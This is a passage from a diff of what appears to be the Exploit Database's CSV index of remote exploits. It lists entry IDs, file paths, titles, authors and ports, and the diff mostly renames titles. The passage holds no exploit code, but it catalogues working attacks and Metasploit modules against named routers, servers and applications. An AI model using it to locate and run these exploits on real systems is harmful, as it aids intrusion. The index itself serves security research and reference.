Disclosure",2003-02-10,stickler,hardware,remote,0 22244,platforms/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",hardware,remote,0 22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0 22264,platforms/linux/remote/22264.txt,"OpenSSL 0.9.x - CBC Error Information Leakage",2003-02-19,"Martin Vuagnoux",linux,remote,0 @@ -13218,7 +13219,7 @@ id,file,description,date,author,platform,type,port 23185,platforms/windows/remote/23185.txt,"software602 602pro lan suite 2003 - Directory Traversal",2003-09-25,"Phuong Nguyen",windows,remote,0 23186,platforms/linux/remote/23186.txt,"MPlayer 0.9/1.0 - Streaming ASX Header Parsing Buffer Overrun",2003-09-25,"Otero Hernan",linux,remote,0 23187,platforms/cgi/remote/23187.txt,"SBox 1.0.4 - Full Path Disclosure",2003-09-25,"Julio e2fsck Cesar",cgi,remote,0 -23188,platforms/linux/remote/23188.c,"Athttpd 0.4b - Remote GET Request Buffer Overrun",2003-09-25,r-code,linux,remote,0 +23188,platforms/linux/remote/23188.c,"Athttpd 0.4b - GET Remote Buffer Overrun",2003-09-25,r-code,linux,remote,0 23196,platforms/linux/remote/23196.c,"WebFS 1.x - Long Pathname Buffer Overrun",2003-09-29,jsk,linux,remote,0 23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String",2003-09-29,"Luigi Auriemma",windows,remote,0 23199,platforms/multiple/remote/23199.c,"OpenSSL - ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0 @@ -13262,7 +13263,7 @@ id,file,description,date,author,platform,type,port 23323,platforms/windows/remote/23323.py,"Novell File Reporter (NFR) Agent - XML Parsing Remote Code Execution",2012-12-12,Abysssec,windows,remote,0 23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (1)",2003-11-03,airsupply,windows,remote,0 23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (2)",2003-11-03,exworm,windows,remote,0 -23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 - Long GET Request Buffer Overrun",2003-11-03,"Peter Winter-Smith",windows,remote,0 +23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 - GET Buffer Overrun",2003-11-03,"Peter Winter-Smith",windows,remote,0 23340,platforms/windows/remote/23340.txt,"Microsoft Internet Explorer 6 - Double Slash Cache Zone Bypass",2003-10-05,"Liu Die Yu",windows,remote,0 23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service - Cross-Site Scripting",2003-11-17,"Ziv Kamir",multiple,remote,0 23365,platforms/windows/remote/23365.txt,"TelCondex SimpleWebserver 2.13.31027 build 3289 - Directory Traversal",2003-11-10,nimber@designer.ru,windows,remote,0 @@ -13277,7 +13278,7 @@ id,file,description,date,author,platform,type,port 23379,platforms/hardware/remote/23379.txt,"Fortigate Firewall 2.x - selector Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 23380,platforms/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 - Error Message Cross-Site Scripting",2003-11-13,"Oliver Karow",multiple,remote,0 23396,platforms/multiple/remote/23396.txt,"SIRCD Server 0.5.2/0.5.3 - Operator Privilege Escalation",2003-11-20,"Victor Jerlin",multiple,remote,0 -23397,platforms/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 - Overly Long HTTP Request Buffer Overrun",2003-11-24,Shadowinteger,linux,remote,0 +23397,platforms/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 - Long HTTP Request Buffer Overrun",2003-11-24,Shadowinteger,linux,remote,0 23398,platforms/windows/remote/23398.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (1)",2003-11-25,"Paul Szabo",windows,remote,0 23399,platforms/windows/remote/23399.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (2)",2003-11-25,"Paul Szabo",windows,remote,0 23400,platforms/windows/remote/23400.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (1)",2003-11-25,"Liu Die",windows,remote,0 @@ -13372,7 +13373,7 @@ id,file,description,date,author,platform,type,port 23679,platforms/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote,0 23700,platforms/windows/remote/23700.txt,"ACLogic CesarFTP 0.99 - Remote Resource Exhaustion",2004-02-16,"intuit e.b.",windows,remote,0 23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote,0 -23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Request Buffer Overflow",2004-02-13,badpack3t,windows,remote,0 +23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow",2004-02-13,badpack3t,windows,remote,0 23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help And Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0 23721,platforms/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 - SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",hardware,remote,0 23728,platforms/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow/Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote,0 @@ -13455,7 +13456,7 @@ id,file,description,date,author,platform,type,port 24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String",2004-05-03,"Nilanjan De",linux,remote,0 24084,platforms/multiple/remote/24084.py,"Nagios3 - history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0 24093,platforms/linux/remote/24093.c,"Exim Sender 3.35 - Verification Remote Stack Buffer Overrun",2004-05-06,newroot,linux,remote,0 -24097,platforms/windows/remote/24097.c,"MyWeb HTTP Server 3.3 - GET Request Buffer Overflow",2004-05-06,badpack3t,windows,remote,0 +24097,platforms/windows/remote/24097.c,"MyWeb HTTP Server 3.3 - GET Buffer Overflow",2004-05-06,badpack3t,windows,remote,0 24098,platforms/windows/remote/24098.txt,"Qualcomm Eudora 6.x - Embedded Hyperlink URI Obfuscation",2004-05-08,"Brett Glass",windows,remote,0 24101,platforms/windows/remote/24101.txt,"Microsoft Outlook 2003 - Predictable File Location",2004-05-10,http-equiv,windows,remote,0 24102,platforms/windows/remote/24102.txt,"Microsoft Internet Explorer 4/5/6 - Embedded Image URI Obfuscation",2004-05-10,http-equiv,windows,remote,0 @@ -13469,11 +13470,11 @@ id,file,description,date,author,platform,type,port 24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0 -24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 +24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - GET Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 24133,platforms/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0 24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0 -24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0 +24140,platforms/hardware/remote/24140.txt,"NETGEAR RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0 24148,platforms/multiple/remote/24148.txt,"Sun Java System Application Server 7.0/8.0 - Remote Installation Full Path Disclosure",2004-05-27,"Marc Schoenefeld",multiple,remote,0 24149,platforms/php/remote/24149.php,"PHP 4/5 - Input/Output Wrapper Remote File Inclusion Function Command Execution",2004-05-27,Slythers,php,remote,0 24187,platforms/windows/remote/24187.txt,"Microsoft Internet Explorer 6 - ADODB.Stream Object File Installation",2003-08-23,Jelmer,windows,remote,0 @@ -13640,7 +13641,7 @@ id,file,description,date,author,platform,type,port 24904,platforms/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,windows,remote,0 24905,platforms/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,multiple,remote,0 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0 -24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B - setup.cgi Remote Command Execution (Metasploit)",2013-04-08,Metasploit,hardware,remote,0 +24931,platforms/hardware/remote/24931.rb,"NETGEAR DGN1000B - setup.cgi Remote Command Execution (Metasploit)",2013-04-08,Metasploit,hardware,remote,0 24935,platforms/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0 24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 - apply.cgi Remote Command Injection (Metasploit)",2013-04-08,Metasploit,hardware,remote,0 24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0 @@ -13657,7 +13658,7 @@ id,file,description,date,author,platform,type,port 24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0 24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",multiple,remote,50000 25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 -24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B - pppoe.cgi Remote Command Execution (Metasploit)",2013-04-22,Metasploit,hardware,remote,0 +24974,platforms/hardware/remote/24974.rb,"NETGEAR DGN2200B - pppoe.cgi Remote Command Execution (Metasploit)",2013-04-22,Metasploit,hardware,remote,0 24976,platforms/multiple/remote/24976.rb,"Java Applet - Reflection Type Confusion Remote Code Execution (Metasploit)",2013-04-23,Metasploit,multiple,remote,0 24979,platforms/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",multiple,remote,0 24980,platforms/multiple/remote/24980.txt,"Yanf 0.4 - HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 @@ -14113,14 +14114,14 @@ id,file,description,date,author,platform,type,port 29035,platforms/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow (Metasploit)",2013-10-18,Asesino04,windows,remote,0 29045,platforms/windows/remote/29045.txt,"Selenium Web Server 1.0 - Cross-Site Scripting",2006-11-15,"Greg Linares",windows,remote,0 29083,platforms/windows/remote/29083.txt,"Sage 1.3.x - IMG Element Input Validation",2006-09-08,"Kevin Kierznowski",windows,remote,0 -29096,platforms/windows/remote/29096.rb,"Netgear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0 +29096,platforms/windows/remote/29096.rb,"NETGEAR MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0 29127,platforms/hardware/remote/29127.rb,"D-Link DIR-605L - Captcha Handling Buffer Overflow (Metasploit)",2013-10-22,Metasploit,hardware,remote,80 29129,platforms/windows/remote/29129.rb,"Interactive Graphical SCADA System - Remote Command Injection (Metasploit)",2013-10-22,Metasploit,windows,remote,12397 29130,platforms/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet - Directory Traversal (Metasploit)",2013-10-22,Metasploit,windows,remote,8080 29132,platforms/unix/remote/29132.rb,"WebTester 5.x - Command Execution (Metasploit)",2013-10-22,Metasploit,unix,remote,80 29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x - GNUTYPE_NAMES Directory Traversal",2006-11-21,"Teemu Salmela",linux,remote,0 29146,platforms/windows/remote/29146.c,"Novell Client 4.91 - 'NWSPOOL.dll' Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",windows,remote,0 -29167,platforms/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0 +29167,platforms/windows/remote/29167.rb,"NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0 29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload (Metasploit)",2013-10-26,Metasploit,php,remote,80 29273,platforms/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,hardware,remote,8080 @@ -14205,7 +14206,7 @@ id,file,description,date,author,platform,type,port 29807,platforms/php/remote/29807.php,"PHP 5.1.6 - 'Imap_Mail_Compose()' Function Buffer Overflow",2007-03-31,"Stefan Esser",php,remote,0 29808,platforms/php/remote/29808.php,"PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",php,remote,0 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 - 'LPEXT.dll' Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0 -29815,platforms/hardware/remote/29815.rb,"Netgear ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,hardware,remote,443 +29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,hardware,remote,443 29820,platforms/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",multiple,remote,0 29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,windows,remote,0 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0 @@ -14323,7 +14324,7 @@ id,file,description,date,author,platform,type,port 30645,platforms/windows/remote/30645.txt,"Microsoft Windows - URI Handler Command Execution",2007-10-05,"Billy Rios",windows,remote,0 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 - SIP From Field HTML Injection",2007-10-09,"Radu State",hardware,remote,0 30652,platforms/hardware/remote/30652.txt,"Cisco IOS 12.3 - LPD Remote Buffer Overflow",2007-10-10,"Andy Davis",hardware,remote,0 -30673,platforms/hardware/remote/30673.txt,"Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0 +30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0 30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote,0 30678,platforms/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",multiple,remote,0 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - 'ierpplug.dll' ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote,0 @@ -14357,7 +14358,7 @@ id,file,description,date,author,platform,type,port 30915,platforms/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution (Metasploit)",2014-01-14,Metasploit,hardware,remote,32764 30920,platforms/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 - 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote,0 30928,platforms/php/remote/30928.php,"PDFlib 7.0.2 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote,0 -30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - Crafted '.ZPL' File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0 +30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - '.ZPL' Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0 30935,platforms/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0 30939,platforms/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,windows,remote,0 30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow / Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0 @@ -14453,7 +14454,7 @@ id,file,description,date,author,platform,type,port 31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",windows,remote,0 31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,php,remote,0 31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",unix,remote,0 -31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80 +31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80 31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution (Metasploit)",2014-02-18,Metasploit,windows,remote,0 31756,platforms/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote,0 31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote,0 @@ -14659,7 +14660,7 @@ id,file,description,date,author,platform,type,port 33023,platforms/multiple/remote/33023.txt,"Apache Tomcat 6.0.18 - Form Authentication Existing/Non-Existing 'Username' Enumeration",2009-06-03,"D. Matscheko",multiple,remote,0 33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 - 'cfgadvanced.html' HTTP Header Injection",2009-06-05,Inferno,windows,remote,0 -33027,platforms/windows/remote/33027.py,"Kolibri Web Server 2.0 - GET Request Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80 +33027,platforms/windows/remote/33027.py,"Kolibri Web Server 2.0 - GET Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80 33032,platforms/linux/remote/33032.txt,"Compress::Raw::Zlib Perl Module - Remote Code Execution",2009-05-11,"Leo Bergolth",linux,remote,0 33033,platforms/multiple/remote/33033.html,"WebKit - JavaScript 'onload()' Event Cross Domain Scripting",2009-05-08,"Michal Zalewski",multiple,remote,0 33034,platforms/linux/remote/33034.txt,"WebKit - XML External Entity Information Disclosure",2009-05-08,"Chris Evans",linux,remote,0 @@ -14699,7 +14700,7 @@ id,file,description,date,author,platform,type,port 33164,platforms/multiple/remote/33164.txt,"WebKit - Floating Point Number Remote Buffer Overflow",2009-08-11,Apple,multiple,remote,0 33165,platforms/hardware/remote/33165.txt,"2WIRE Routers - 'CD35_SETUP_01' Access Validation",2009-08-12,hkm,hardware,remote,0 33172,platforms/windows/remote/33172.txt,"Valve Software Source Engine - Format String",2009-08-17,"Luigi Auriemma",windows,remote,0 -33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0 +33177,platforms/hardware/remote/33177.txt,"NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0 33192,platforms/multiple/remote/33192.php,"Google Chrome 6.0.472 - 'Math.Random()' Random Number Generation",2009-08-31,"Amit Klein",multiple,remote,0 33203,platforms/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",multiple,remote,0 33207,platforms/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Buffer Overflow",2009-09-01,"optix hacker",windows,remote,0 @@ -14806,7 +14807,7 @@ id,file,description,date,author,platform,type,port 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33816,platforms/multiple/remote/33816.pl,"Miranda IM 0.8.16 - Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote,0 33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server - Buffer Overflow (Metasploit)",2014-06-19,Metasploit,windows,remote,8080 -33852,platforms/windows/remote/33852.txt,"HTTP 1.1 - GET Request Directory Traversal",2010-06-20,chr1x,windows,remote,0 +33852,platforms/windows/remote/33852.txt,"HTTP 1.1 - GET Directory Traversal",2010-06-20,chr1x,windows,remote,0 33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 - 'Parameters' Attribute Remote Code Execution",2010-04-08,apoc,linux,remote,0 33829,platforms/windows/remote/33829.c,"WinSoftMagic Photo Editor - '.png' Buffer Overflow",2010-04-09,eidelweiss,windows,remote,0 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",multiple,remote,0 @@ -14858,8 +14859,8 @@ id,file,description,date,author,platform,type,port 34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) - Cross-Site Request Forgery",2010-05-26,"John Leitch",windows,remote,0 34048,platforms/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 - 'pbx/gate' Cross-Site Request Forgery",2010-05-26,"John Leitch",multiple,remote,0 34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal",2010-05-27,"John Leitch",windows,remote,0 -34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request (SEH)",2014-07-14,"Revin Hadi Saputra",windows,remote,0 -34063,platforms/hardware/remote/34063.rb,"D-Link Devices - 'info.cgi' POST Request Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 +34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Exploit (SEH)",2014-07-14,"Revin Hadi Saputra",windows,remote,0 +34063,platforms/hardware/remote/34063.rb,"D-Link Devices - 'info.cgi' POST Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 34065,platforms/hardware/remote/34065.rb,"D-Link Devices - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,hardware,remote,1900 34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0 @@ -15016,7 +15017,7 @@ id,file,description,date,author,platform,type,port 35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution",2011-01-05,d3c0der,windows,remote,0 35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0 35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80 -35184,platforms/hardware/remote/35184.py,"Belkin n750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 +35184,platforms/hardware/remote/35184.py,"Belkin N750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0 35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server - Remote Code Execution (Metasploit)",2014-11-10,Metasploit,java,remote,8001 @@ -15118,7 +15119,7 @@ id,file,description,date,author,platform,type,port 35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 - Unspecified Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0 -35817,platforms/hardware/remote/35817.txt,"Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 +35817,platforms/hardware/remote/35817.txt,"NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Parameter Cross-Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,linux,remote,0 @@ -15355,7 +15356,7 @@ id,file,description,date,author,platform,type,port 38124,platforms/android/remote/38124.py,"Google Android - 'Stagefright' Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console - Directory Traversal",2013-01-09,"Dhruv Shah",linux,remote,0 38151,platforms/windows/remote/38151.py,"Microsoft Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0 -38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default - WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0 +38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router - Default WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0 38170,platforms/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0 38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0 38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0 @@ -15497,13 +15498,13 @@ id,file,description,date,author,platform,type,port 38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)",2015-12-15,Metasploit,jsp,remote,8020 38983,platforms/java/remote/38983.rb,"Jenkins CLI - RMI Java Deserialization (Metasploit)",2015-12-15,Metasploit,java,remote,8080 39007,platforms/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0 -39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 +39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution",2014-02-03,"Josue 